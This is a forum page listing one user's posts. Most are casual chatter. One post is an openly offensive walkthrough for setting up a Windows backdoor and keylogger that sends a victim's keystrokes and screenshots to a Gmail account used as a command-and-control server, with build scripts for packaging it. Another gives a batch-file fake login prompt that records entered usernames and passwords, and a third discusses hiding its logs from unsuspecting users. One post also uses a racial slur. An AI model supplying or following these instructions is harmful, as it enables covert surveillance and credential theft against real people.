User Controls

  1. 1
  2. 2
  3. 3
  4. ...
  5. 15
  6. 16
  7. 17
  8. 18

Posts by Hewfil1

  1. Hewfil1 Houston
    MFW


    LanLan is scurred.;-;
  2. Hewfil1 Houston
    Yes but what ya'll niggers are forgetting is that if you don't have your keylogger contact a remote host to send everything it logs your program is basically useless, no offense.

    Here's something more useful.

    Backdoor with keylogger for windows.

    https://github.com/byt3bl33d3r/gcat/...ter/implant.py

    And your controller.

    https://github.com/byt3bl33d3r/gcat/blob/master/gcat.py

    You'll need python of courrse and these libs: (They have to be installed)

    http://sourceforge.net/projects/pywin32/
    http://sourceforge.net/projects/pyhook/

    You'll also need to go into your python folder and find pip.exe to install that module so you can screencap your victim's desktop.

    You're going to have to setup a gmail as command and control server and have to tell the program where to send and recieve commands from you do that by changing the following variables:


    #######################################
    gmail_user = 'example@gmail.com'
    gmail_pwd = 'password'
    server = "smtp.gmail.com"
    server_port = 587
    #######################################


    Change variable gmail_user to equal the adress you set up. Change variable gmail_pwd to equal the password you created for that account.

    You're going to have to compile implant.py with py2exe.

    http://sourceforge.net/projects/py2exe/

    Your controller gcat you can just run from the command line.

    Lanny was kind enough to hook me up with a script to help compile implant.py. Open up your favorite text editor and enter the following code and save it as setup.py


    try:
    # py2exe 0.6.4 introduced a replacement modulefinder.
    # This means we have to add package paths there, not to the built-in
    # one. If this new modulefinder gets integrated into Python, then
    # we might be able to revert this some day.
    # if this doesn't work, try import modulefinder
    try:
    import py2exe.mf as modulefinder
    except ImportError:
    import modulefinder
    import win32com, sys
    for p in win32com.__path__[1:]:
    modulefinder.AddPackagePath("win32com", p)
    for extra in ["win32com.shell"]: #,"win32com.mapi"
    __import__(extra)
    m = sys.modules[extra]
    for p in m.__path__[1:]:
    modulefinder.AddPackagePath(extra, p)
    except ImportError:
    # no build path setup, no worries.
    pass

    from distutils.core import setup
    import py2exe

    setup(console=["implant.py"], options={"py2exe": {"packages": ["email"]}})


    When that's done open up a command prompt and use the command cd to go to the directory where you have saved implant.py and setup.py and run the command: python setup.py py2exe, to compile. If you're smart you'll structure your command like this -> "python setup.py py2exe >> log.txt" then you can check what your terminal outputs in the dump log.txt to see if everything went well.

    Note: You may want to use https://github.com/pyinstaller/pyinstaller instead of py2exe because py2xe had some problems importing the email modules.

    Major props to lanny for helping me out with this backdoor with gmal as C&C server <3. I was kind of excited so i thought i'd share, if you have any questions i'll try to answer them, it took me a bit and i am still fiddling with program but i do believe i got everything to work i am currently testing it's functionality. Also before i foget after you compile you're going to have some directories and implant.exe, you're going to have to get all of your dependencies in a single file it's a little more involved with py2.exe but with pyinstaller it's as simple as adding –onefile to the command line when compiling. Which is why you might want to opt for pyinstaller in general.


    Badass as always Soph. \m/
  3. Hewfil1 Houston
    Ah, sorry. I'm half asleep and didn't notice.
  4. Hewfil1 Houston
    So do threads about music just go into Moving Pictures or what? We used to have separate threads for music and tv and stuff, so I'm not sure.
  5. Hewfil1 Houston
    Waiting for, "§m£ÂgØL's Zoo. Someone fucked the dolphin."
  6. Hewfil1 Houston
    Kek. Kek.
  7. Hewfil1 Houston
    Very nifty little trick. How much does the program interfere as the user goes about their buisness? Or more concisely how much effort would an unsuspecting user need to put into noticing the program to find it? let's assume the logs file has been moved to a deep system folder rather than the desktop to circumvent that issue.


    It doesn't stay on the desktop. That folder gets moved to a system folder. SO unless they check it, they would have no clue, BUT the .bat would need to be executed remotely without their knowledge to allow the logging to start.
    *Recheck my post. The folder gets drug into the C:\*
  8. Hewfil1 Houston
    why not just use keepass x or something?

    Because I don't want to. I like the keylogger because it requires an effort on my part.
  9. Hewfil1 Houston
    If you change the word after C:in line 8 to something different, can you name the folder on your desktop that same name?

    forgive the dumb question, I suck at computers.

    You could try. I haven't done it considering I only use mine for saving passwords because I have to change them constantly.
  10. Hewfil1 Houston
    Not that new.


    Shhhhhhh. >.>'
  11. Hewfil1 Houston
    Write a remote access trojan.
    All new meaning to RAT.
  12. Hewfil1 Houston
    Original files were taken off Mega.
  13. Hewfil1 Houston
    The following is to be used for research purposes only, and I take no responsibility for anything done with malicious intent.

    Alright, we're just going to use Notepad to make a simple .bat (Batch) file, keylogger.

    Start by opening Notepad, then pasting in the following code:

    @echo off
    color a
    title Login
    cls
    echo Please Enter Email Adress And Password
    echo.
    echo.
    cd "C:\Logs"
    set /p user=Username:
    set /p pass=Password:
    echo Username="%user%" Password="%pass%" &gt;&gt; Log.txt
    start &gt;&gt;Program Here&lt;&lt;
    exit

    Make a folder on your desktop called "Logs". It must be logs or it will not work.

    Drag that folder into C:\

    Now run a test of your "Logger.bat".

    Once tested, go back to the "Logs" folder in C:\ and there will be a .txt file. If a second entry is made, the .txt will overwrite itself.

    Enjoy!
  14. Hewfil1 Houston
    Where the fuck is the sidebar? You know we're lazy and don't want to have to look for shit.
  15. Hewfil1 Houston
    Nero. <3
  16. Hewfil1 Houston
    They just prefer to keep him comatose in the basement.
  1. 1
  2. 2
  3. 3
  4. ...
  5. 15
  6. 16
  7. 17
  8. 18
Jump to Top